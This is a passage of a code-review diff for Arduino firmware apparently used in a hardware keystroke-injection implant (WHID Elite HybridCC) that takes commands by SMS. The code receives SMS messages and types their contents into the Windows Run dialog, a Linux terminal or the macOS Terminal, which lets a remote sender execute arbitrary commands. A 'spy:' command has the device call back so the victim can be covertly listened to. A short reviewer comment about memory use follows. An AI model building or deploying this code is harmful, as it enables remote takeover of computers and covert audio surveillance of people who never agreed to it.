WHID_Elite_HybridCC_v.1.0/WHID_Elite_HybridCC_v.1.0.ino

```diff
@@ -0,0 +1,463 @@
+          delay(500);
+          Keyboard.press(KEY_LEFT_GUI);
+          delay(50);
+          Keyboard.press((char) 114); //In Decimal, is r
+          //Keyboard.write((char) 0x72); //In Hex
+          Keyboard.releaseAll();
+          delay(1000);
+          Keyboard.print((smsBuffer + 4));
+          delay(1000);
+          typeKey(KEY_RETURN);
+          delay(1000);
+        }
+        
+        //####### nix: #############################################################################
+        //# It runs ALT + F2, opens a shell and executes the payload contained into the SMS
+        //##########################################################################################
+        else if (strncmp(smsBuffer, "nix:", 4) == 0) {
+          // It runs ALT + F2, opens a shell and executes the payload contained into the SMS
+          delay(500);
+          Keyboard.press(KEY_LEFT_GUI);
+          delay(50);
+          Keyboard.releaseAll();
+          delay(1000);
+          // No need for terminal ALT-F2 straight runs commands
+          // And it is multi-desktop solution
+          Keyboard.print("term");
+          delay(1500);
+          typeKey(KEY_RETURN);
+          delay(1500);
+          Keyboard.print(" ");
+          Keyboard.print(smsBuffer + 4);
+          //Keyboard.print(";exit");
+          delay(1500);
+          typeKey(KEY_RETURN);
+          delay(1000);
+        }
+        
+        //####### osx: #############################################################################
+        //# It opens a shell and executes the payload contained into the SMS
+        //##########################################################################################
+        else if (strncmp(smsBuffer, "osx:", 4) == 0) {
+          // It opens a shell and executes the payload contained into the SMS
+          delay(500);
+          Keyboard.press(KEY_LEFT_GUI);
+          delay(50);
+          Keyboard.press((char) 32); //In Decimal, is SPACE
+          Keyboard.releaseAll();
+          delay(1000);
+          Keyboard.print("terminal.app");
+          delay(1000);
+          typeKey(KEY_RETURN);
+          delay(1000);
+          Keyboard.print(smsBuffer + 4);
+          delay(1000);
+          typeKey(KEY_RETURN);
+        }
+        
+        //####### spy: ############################################
+        //# It enables the internal Microphone and calls you back.
+        //#########################################################
+        else if (strncmp(smsBuffer, "spy:", 4) == 0) {
+          delay(1000);
+          
+          if (!fona.callPhone((smsBuffer + 4))) {
+            Serial.println(F("Call Failed"));
+          } else {
+            Serial.println(F("### STARTING ACOUSTIC SURVEILLANCE ###"));
+            delay(1000);
+          }
+        }
+        
+        //####### getlocation: ########################################################
```

Comment:
Here I use the FONA GPRS command to Enable GPRS > Get Location > Disable GPRS
Maybe you can reuse these functions too in hybridC2off: anf hybridC2on:?
I guess it would be more clean and would save memory.

What do you think?